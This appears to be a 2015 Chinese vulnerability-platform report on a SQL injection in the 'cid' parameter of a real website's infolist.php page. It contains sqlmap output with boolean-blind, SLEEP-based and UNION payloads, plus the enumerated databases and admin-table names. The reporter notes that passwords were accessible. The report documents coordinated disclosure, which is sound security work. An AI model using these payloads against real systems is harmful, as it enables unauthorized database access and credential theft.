2015-11-04: 细节已通知厂商并且等待厂商处理中 2015-11-06: 厂商已经确认,细节仅向厂商公开 2015-11-16: 细节向核心白帽子及相关领域专家公开 2015-11-26: 细节向普通白帽子公开 2015-12-06: 细节向实习白帽子公开 2015-12-21: 细节向公众公开
马哥说,挖洞的技巧是什么?是要随缘~~~~
注入点**.**.**.**/infolist.php?id=main&id=43&cid=44 注入参数为“cid”
sqlmap identified the following injection point(s) with a total of 306 HTTP(s) requests:---Parameter: cid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=main&id=43&cid=44 AND 3851=3851 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=main&id=43&cid=44 AND (SELECT * FROM (SELECT(SLEEP(5)))QFgl) Type: UNION query Title: Generic UNION query (NULL) - 21 columns Payload: id=main&id=43&cid=-8549 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a766b71,0x52506f5346596e72516d,0x7170766271),NULL-- ---web application technology: Nginx, PHP 5.2.14back-end DBMS: MySQL 5.0.12sqlmap resumed the following injection point(s) from stored session:---Parameter: cid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=main&id=43&cid=44 AND 3851=3851 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=main&id=43&cid=44 AND (SELECT * FROM (SELECT(SLEEP(5)))QFgl) Type: UNION query Title: Generic UNION query (NULL) - 21 columns Payload: id=main&id=43&cid=-8549 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a766b71,0x52506f5346596e72516d,0x7170766271),NULL-- ---web application technology: Nginx, PHP 5.2.14back-end DBMS: MySQL 5.0.12available databases [9]:[*] bsjq[*] bsjqbak[*] gdvideo[*] guangdian[*] guangdianc[*] guangdiannew[*] information_schema[*] mysql[*] testsqlmap resumed the following injection point(s) from stored session:---Parameter: cid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=main&id=43&cid=44 AND 3851=3851 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=main&id=43&cid=44 AND (SELECT * FROM (SELECT(SLEEP(5)))QFgl) Type: UNION query Title: Generic UNION query (NULL) - 21 columns Payload: id=main&id=43&cid=-8549 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a766b71,0x52506f5346596e72516d,0x7170766271),NULL-- ---web application technology: Nginx, PHP 5.2.14back-end DBMS: MySQL 5.0.12Database: guangdian[21 tables]+----------------------+| cupid_admin || cupid_config || cupid_contentbase || cupid_contentclass || cupid_contentcontent || cupid_diaocha_log || cupid_hdp || cupid_indexmodule || cupid_messages || cupid_moudleclass || cupid_newbase || cupid_newsclass || cupid_newscontent || cupid_proclass || cupid_procut || cupid_single || cupid_substation || cupid_templates || cupid_toupiao || cupid_toupiaoip || cupid_weblink |+----------------------+
密码啥的都有,也没深入了。主站不应该啊...
。。。
危害等级:高
漏洞Rank:10
确认时间:2015-11-06 10:49
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无